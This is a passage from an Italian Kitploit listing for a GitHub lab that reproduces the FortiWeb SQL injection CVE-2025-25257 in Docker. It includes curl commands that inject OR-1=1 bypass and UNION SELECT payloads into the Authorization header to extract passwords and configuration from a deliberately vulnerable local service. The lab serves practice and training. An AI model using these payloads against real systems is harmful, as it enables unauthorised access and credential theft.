Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2025-25257 | Kitploit
Strumenti/GitHubGitHub/lytianahkone-boop/cve-2025-25257
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneSicurezza dei DatabaseLab e Pratica
GitHublytianahkone-boop/cve-2025-25257

cve-2025-25257

Vedi Repository
8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-25257 - Ambiente di Sperimentazione

Architettura della Sperimentazione (l'ambiente simula i componenti vulnerabili di FortiWeb)

root@kitploit:~
Endpoint vulnerabile: /api/system/fabric/config
Vettore di iniezione: Header HTTP Authorization: Bearer
Meccanismo: Concatenazione SQL diretta (f-string Python)
Autenticazione: Nessuna (bypass totale)
Database: SQLite (per dimostrazione)

cve-2025-25257

├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md

Dockerfile: servizio http volutamente vulnerabile / espone un'API sfruttabile senza autenticazione

docker-compose.yml: orchestra un servizio vulnerabile riproducibile / espone l'API attaccabile via http / isola l'ambiente di sperimentazione

requirements.txt: garantisce un ambiente stabile e riproducibile

app.py: implementa un endpoint pre-autenticazione / accetta un input utente tramite Authorization / concatena tale input in una query SQL / consente il bypass dell'autenticazione e l'estrazione dei dati

init_db.py: prepara un set di dati sfruttabile / consente una chiara dimostrazione del bypass dell'autenticazione e dell'esfiltrazione dei dati

payload.txt fornisce una prova minima, controllata e osservabile di esecuzione di codice

Passaggio 1: Costruire e avviare il contenitore

Costruzione dell'immagine Docker

docker-compose build

Avvio del contenitore

docker-compose up -d

Verificare che il contenitore sia attivo

docker-compose ps

Consultare i log

docker-compose logs -f

Passaggio 2: Verificare l'accessibilità del servizio

curl http://localhost:8080/api/system/status

Passaggio 3: Sfruttamento della vulnerabilità

Richiesta non malintenzionata

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"

Iniezione di query SQL malintenzionata Bypass con OR 1=1

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"

Estrazione di dati con iniezione UNION-SELECT

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"

Esfiltrazione dei dati sensibili

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"

Passaggio 4: Pulizia e Arresto

Arrestare il contenitore

docker-compose down

Eliminare i volumi

docker-compose down -v

Eliminare l'immagine

docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest

Scarica lo strumento